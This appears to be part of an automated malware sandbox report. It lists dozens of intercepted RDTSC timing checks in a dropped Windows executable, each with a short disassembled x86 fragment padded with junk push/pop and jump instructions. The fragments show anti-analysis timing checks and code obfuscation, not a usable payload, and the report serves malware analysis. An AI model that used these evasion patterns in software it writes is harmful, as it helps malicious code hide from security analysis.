Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C626 second address: C0C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D94219E7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D94219D6h 0x0000001a jno 00007F34D94219D6h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C658 second address: C0C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7C4 second address: C0C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7DF second address: C0C7E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C7E9 second address: C0C81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DFh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C95D second address: C0C963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C963 second address: C0C988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F34D94219E3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C988 second address: C0C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0C9A6 second address: C0C9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CC98 second address: C0CCAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F34D8F44CB6h 0x00000009 js 00007F34D8F44CB6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CF85 second address: C0CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0CF8B second address: C0CF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D0BE second address: C0D0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219E1h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D23A second address: C0D247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F34D8F44CB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D247 second address: C0D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F34D94219E8h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D415 second address: C0D419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D419 second address: C0D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D41F second address: C0D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C0D429 second address: C0D438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C10367 second address: C1036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C114EE second address: C114FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C11683 second address: C1168D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F34D8F44CB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1168D second address: C11691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE207C second address: BE20A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007F34D8F44CC2h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F34D8F44CB6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE20A4 second address: BE20AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C19175 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE54DD second address: BE54EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BE54EB second address: BE54F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C18E60 second address: C18E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C523 second address: C1C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C527 second address: C1C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F34D94219DBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1CB26 second address: C1CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1CB2C second address: C1CB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1D2E6 second address: C1D335 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F34D8F44CB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F34D8F44CC8h 0x0000002b nop 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1D900 second address: C1D94E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, bx 0x0000000c xchg eax, ebx 0x0000000d jno 00007F34D94219F5h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219E9h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF12 second address: C1DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF1F second address: C1DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1DF3C second address: C1DF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E7EF second address: C1E7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F6A5 second address: C1F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E66A second address: C1E674 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F6B0 second address: C1F71D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CC2h 0x00000008 jmp 00007F34D8F44CBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F34D8F44CB8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1C77h], esi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 jmp 00007F34D8F44CC6h 0x0000003d mov cx, 87F9h 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D23B7h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1E674 second address: C1E682 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C201B4 second address: C201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2024C second address: C20251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1FF99 second address: C1FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20251 second address: C20261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20261 second address: C20266 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20AFF second address: C20B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C21640 second address: C2164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20B04 second address: C20B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22049 second address: C2204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C20B09 second address: C20B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22CFD second address: C22D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22D03 second address: C22D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D94219DCh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007F34D94219D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C22D21 second address: C22D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2447F second address: C24483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C24483 second address: C24487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C24487 second address: C244D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F34D94219D8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 jp 00007F34D94219DCh 0x00000029 sub ebx, dword ptr [ebp+1244CD30h] 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D1F27h] 0x00000037 xchg eax, esi 0x00000038 push ecx 0x00000039 jl 00007F34D94219DCh 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C244D6 second address: C244DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C253F5 second address: C25454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push eax 0x0000000c sub edi, dword ptr [ebp+122D35B5h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F34D94219D8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 mov ebx, esi 0x00000034 pop edi 0x00000035 sub edi, 4A2BFA36h 0x0000003b push eax 0x0000003c pushad 0x0000003d jl 00007F34D94219D8h 0x00000043 pushad 0x00000044 jo 00007F34D94219D6h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26319 second address: C2631F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C27237 second address: C272A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F34D94219E4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F34D94219D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov bx, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F34D94219D8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C272A6 second address: C272AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A846 second address: C2A861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A861 second address: C2A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A870 second address: C2A87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C25555 second address: C2555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26520 second address: C2652B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2A87E second address: C2A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C29926 second address: C29941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2652B second address: C26530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26530 second address: C26598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D2716h], eax 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or dword ptr [ebp+122D23B2h], ecx 0x00000024 mov eax, dword ptr [ebp+122D139Dh] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F34D94219D8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 and ebx, 40C7A673h 0x0000004a push FFFFFFFFh 0x0000004c mov edi, dword ptr [ebp+122D3601h] 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007F34D94219D6h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C26598 second address: C265AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BA5E second address: C2BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2F9B4 second address: C2F9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BA62 second address: C2BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2BB4C second address: C2BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C31B61 second address: C31B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C31B65 second address: C31B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C34CC4 second address: C34CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F34D94219E8h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F34D94219DEh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2EB2D second address: C2EB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
